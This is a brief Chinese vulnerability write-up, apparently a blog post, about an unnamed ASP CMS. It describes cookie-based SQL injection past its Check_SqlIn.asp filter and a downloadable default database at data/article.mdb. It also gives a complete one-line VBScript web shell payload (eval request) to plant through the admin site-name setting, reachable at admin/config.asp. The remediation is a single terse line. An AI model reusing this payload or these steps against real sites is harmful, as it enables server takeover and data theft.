下午遇到这个CMS,于是看了看代码
Check_SqlIn.asp防注入代码未过滤完全注入
漏洞:
1)未对cookie方式进行过滤,cookie注入
2)默认数据库:
data/article.mdb
3)后台拿shell:
后台地址:admin/login.asp
系统配置-->网站名称处写入:"<script language=VBScript runat=server>eval request("1")</script>"
一句话地址:
http://www.***.com /admin/config.asp
修复:
修改默认下载地址,过滤
